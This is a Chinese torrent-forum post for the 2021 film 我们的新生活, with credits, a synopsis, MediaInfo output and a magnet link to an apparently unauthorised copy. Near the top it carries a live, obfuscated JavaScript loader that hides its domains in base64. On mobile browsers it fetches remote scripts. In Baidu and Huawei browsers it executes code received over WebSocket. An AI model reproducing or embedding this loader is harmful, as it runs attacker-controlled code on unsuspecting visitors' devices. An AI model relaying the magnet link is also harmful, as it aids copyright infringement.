我们的新生活[国语音轨]Wo.Men.De.Xin.Sheng.Huo.2021.1080p.WEB-DL.H264.DDP5.1-迅雷下载 27.91GB

版主小s 1月前 305

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 我们的新生活
◎年  代 2021
◎产  地 中国大陆
◎类  别 剧情
◎语  言 汉语普通话
◎上映日期 2021-07-23(中国大陆网络)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35303777/
◎片  长 146分钟
◎导  演 申奥 Ao Shen (id:1404918)
       包贝尔 Bei'er Bao (id:1315866)
       姚婷婷 Tingting Yao (id:1324487)
       卢正雨 Zhengyu Lu (id:1320676)
       张栾 Luan Zhang (id:1383594)
◎编  剧 申奥 Ao Shen (id:1404918)
       包贝尔 Bei'er Bao (id:1315866)
       姚婷婷 Tingting Yao (id:1324487)
       卢正雨 Zhengyu Lu (id:1320676)
       张栾 Luan Zhang (id:1383594)
◎演  员 李汶翰 Wenhan Li (id:1337439)
       许君聪 Juncong Xu (id:1362516)
       王锵 Qiang Wang (id:1381513)
       杨子姗 Zishan Yang (id:1312862)
       杨超越 Chaoyue Yang (id:1392263)
       蔡明 Ming Cai (id:1313279)
       包文婧 Wenjing Bao (id:1321296)
       蓝盈莹 Lyric Lan (id:1318954)
       张凯丽 Kaili Zhang (id:1030951)
       王迅 Xun Wang (id:1317139)
       张双利 Shuangli Zhang (id:1317610)
       于洋 Yang Yu (id:1314230)
       白泽泽 Zeze Bai (id:1441799)
       杨迪 Di Yang (id:1317329)
       潘斌龙 Binlong Pan (id:1316365)
       邓超元 Chaoyuan Deng (id:1391670)
       文松 Song Wen (id:1351426)
       黄允桐 Yuntong Huang (id:1457465)
       马汉毅 Hanyi Ma (id:1421438)
       姚弛 Chi Yao  (id:1409931)
       西门飘飘  (id:1422159)
       包贝尔 Bei'er Bao (id:1315866)
       江易轩 Yixuan Jiang (id:1419325)
       靳阳阳 Yangyang Jin (id:1430916)
       喻恩泰 Entai Yu (id:1274271)
       衣云鹤 Yunhe Yi (id:1350228)
       罗辑 Ji Luo (id:1417084)
       范明 Ming Fan (id:1274655)
       杨安迪 Andy (id:1396302)
       蔡国庆 Guoqing Cai (id:1314747)
       程璐 Lu Cheng (id:1385699)
       盖雨嘉 Yujia Ge (id:1412013)
       韩彦博 Yanbo Han (id:1362972)
       白敬亭 Jingting Bai (id:1342133)
       吴纯一 Chunyi Wu (id:1419814)
       赵天爱  (id:1435745)
       洪连城 Liancheng Hong (id:1323303)
       赵华为 Huawei Zhao (id:1407058)
       丁真珍珠 Tenzin Tsundue (id:1450900)
       王超文  (id:1459886)
       刘旭 Xu Liu (id:1401842)
       赵力帜  (id:1459887)
       果晓丹 Xiaodan Guo (id:1327971)
       王韦程 Weicheng Wang (id:1335404)
       葛荣韵  (id:1459894)
       洪伟烈 Weilie Hong (id:1400705)
       周文操 Wencao Zhou (id:1381319)
       徐浚皓 Junhao Xu (id:1413582)
       傅博 Bo Fu (id:1410130)
       王建东  (id:1446567)
       端木瑞  (id:1459888)
       陈志伟 Chi Wai Chan (id:1280415)
       王迪 Di Wang (id:1459890)
       杨虹  (id:1459891)
       伏思博  (id:1459896)
       季佳翰  (id:1459897)
       何爽 Shuang He (id:1384718)
       白馥瑞 Furui Bai (id:1389949)
       王希  (id:1459899)

◎标  签 温情 / 感人 / 搞笑 / 社会 / 剧情 / 2021 / 人性 / 中国大陆

◎简  介
  该片由《云上音乐会》《广场恩仇录》《一路前行》《冷静冷静》《最燃不过夕阳红》五个故事单元组成,讲述新时代平凡人物追求美好生活的奋斗故事。

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 我们的新生活[email protected]DDQ.COM.mp4
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/avc1/mp41)
  7. File size                                : 27.9 GiB
  8. Duration                                 : 2 h 25 min
  9. Overall bit rate                         : 27.4 Mb/s
  10. Writing application                      : OurTV Multimedia Platform
  11. Video
  12. ID                                       : 1
  13. Format                                   : AVC
  14. Format/Info                              : Advanced Video Codec
  15. Format profile                           : [email protected]
  16. Format settings                          : CABAC / 3 Ref Frames
  17. Format settings, CABAC                   : Yes
  18. Format settings, Reference frames        : 3 frames
  19. Format settings, GOP                     : M=1, N=30
  20. Codec ID                                 : avc1
  21. Codec ID/Info                            : Advanced Video Coding
  22. Duration                                 : 2 h 25 min
  23. Bit rate                                 : 26.3 Mb/s
  24. Width                                    : 2 048 pixels
  25. Height                                   : 872 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.613
  34. Stream size                              : 26.8 GiB (96%)
  35. Language                                 : English
  36. Codec configuration box                  : avcC
  37. Audio #1
  38. ID                                       : 2
  39. Format                                   : E-AC-3 JOC
  40. Format/Info                              : Enhanced AC-3 with Joint Object Coding
  41. Commercial name                          : Dolby Digital Plus with Dolby Atmos
  42. Codec ID                                 : ec-3
  43. Duration                                 : 2 h 25 min
  44. Bit rate mode                            : Constant
  45. Bit rate                                 : 768 kb/s
  46. Channel(s)                               : 6 channels
  47. Channel layout                           : L R C LFE Ls Rs
  48. Sampling rate                            : 48.0 kHz
  49. Frame rate                               : 31.250 FPS (1536 SPF)
  50. Compression mode                         : Lossy
  51. Stream size                              : 802 MiB (3%)
  52. Title                                    : 国语全景声
  53. Language                                 : Chinese
  54. Service kind                             : Complete Main
  55. Default                                  : Yes
  56. Alternate group                          : 1
  57. Complexity index                         : Not present / 16
  58. Number of dynamic objects                : 15
  59. Bed channel count                        : 1 channel
  60. Bed channel configuration                : LFE
  61. Audio #2
  62. ID                                       : 3
  63. Format                                   : AAC LC
  64. Format/Info                              : Advanced Audio Codec Low Complexity
  65. Codec ID                                 : mp4a-40-2
  66. Duration                                 : 2 h 25 min
  67. Duration_LastFrame                       : -1 ms
  68. Bit rate mode                            : Constant
  69. Bit rate                                 : 317 kb/s
  70. Channel(s)                               : 2 channels
  71. Channel layout                           : L R
  72. Sampling rate                            : 48.0 kHz
  73. Frame rate                               : 46.875 FPS (1024 SPF)
  74. Compression mode                         : Lossy
  75. Stream size                              : 331 MiB (1%)
  76. Title                                    : 国语AAC2.0
  77. Language                                 : Chinese
  78. Default                                  : No
  79. Alternate group                          : 1


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:63468B9EF9860A3EBC6E65FC33051C756199B25D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回